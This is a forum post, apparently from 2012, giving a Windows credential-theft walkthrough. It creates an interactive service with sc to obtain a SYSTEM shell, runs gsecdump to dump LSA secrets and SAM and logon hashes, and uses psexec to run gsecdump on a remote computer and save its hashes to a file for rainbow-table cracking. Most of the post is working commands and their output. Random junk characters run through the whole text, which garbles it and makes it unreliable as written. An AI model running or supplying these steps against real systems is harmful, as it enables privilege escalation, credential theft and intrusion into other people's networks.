标题: HASH注入式攻击 [打印本页] 作者: admin 时间: 2012-11-6 21:09 标题: HASH注入式攻击 o get a DOS Prompt as NT system: & _9 `+ C0 X! f$ E4 I$ y% w & s! |; m" \; m q9 p5 g7 i3 sC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact ' u+ t; g, L2 E8 f1 p' r0 F[SC] CreateService SUCCESS" G: y6 y6 Y( N. \* d
6 B0 d5 G; i& _% [, R0 sC:\>sc start shellcmdline3 U: T5 [# V$ L6 ~# u
[SC] StartService FAILED 1053: 4 e1 x0 x+ g; l# I3 V ; S, w; @7 `: \, O. TThe service did not respond to the start or control request in a timely fashion. , c3 @$ i D3 o$ F9 G( s+ N/ ~* T5 b
C:\>sc delete shellcmdline 1 t7 C( F" V4 Q3 P" E# i$ I) Q[SC] DeleteService SUCCESS ' y3 c! r1 h3 K! m5 i! O# ~; C, v( ^" E! u, @/ {2 R
------------1 r2 f8 `: `6 D; Y
" w, L( D; J0 s8 J) f: U) `/ jThen in the new DOS window: " i/ ]2 r) ]% I9 ]% G- w5 k1 F; j5 Z% O% [' Y
Microsoft Windows XP [Version 5.1.2600]4 F# o7 s3 u' d* ~0 Z/ e
(C) Copyright 1985-2001 Microsoft Corp. 7 i4 l) A! N) \- |# \ 9 K3 W4 U0 }) W& z( dC:\WINDOWS\system32>whoami" M( o3 d3 H" U( v5 S( J
NT AUTHORITY\SYSTEM2 ]! M w. Q( U4 c% t$ m/ F- m
% K9 F0 g: L( [) a& MC:\WINDOWS\system32>gsecdump -h 0 E" ~- ~4 A$ f$ Agsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se) e! W4 U% _* i# N$ D' z
usage: gsecdump [options] ' t# H/ s) c* _3 E" G, v3 z& N: h+ d& W( j8 K- U
options: # d. G& q5 |$ W-h [ --help ] show help 6 Y; y5 }% p. q9 q# d# X6 P" F-a [ --dump_all ] dump all secrets # O% V p6 E* x$ @) L( K9 j R-l [ --dump_lsa ] dump lsa secrets' l# z6 r6 W0 p( d
-w [ --dump_wireless ] dump microsoft wireless connections6 z& z6 V8 C V& I
-u [ --dump_usedhashes ] dump hashes from active logon sessions" y2 p. M! B% U2 P" b0 c
-s [ --dump_hashes ] dump hashes from SAM/AD4 k. s ?( a* F4 C- `
6 Y9 D* V$ g% y! X
Although I like to use:2 P& x* B Q$ n* j. e
7 `! \# H W! Q$ H# F* H! mPsExec v1.83 - Execute processes remotely9 R( O$ G9 x& s" p. E: @
Copyright (C) 2001-2007 Mark Russinovich 0 w0 m2 V: a& p. cSysinternals - 链接标记[url]www.sysinternals.com[/url]8 ~8 Y) d0 B3 P& f2 _
: _$ p. f$ H/ P8 w% Q4 [
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 o1 W. s2 s3 W
6 ]5 N1 _5 r( V& s9 V
to get the hashes from active logon sessions of a remote system. / e x1 y+ a* P6 [& t* q, O ' i: f& ?( c# j1 MThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.1 s d9 k) P: ?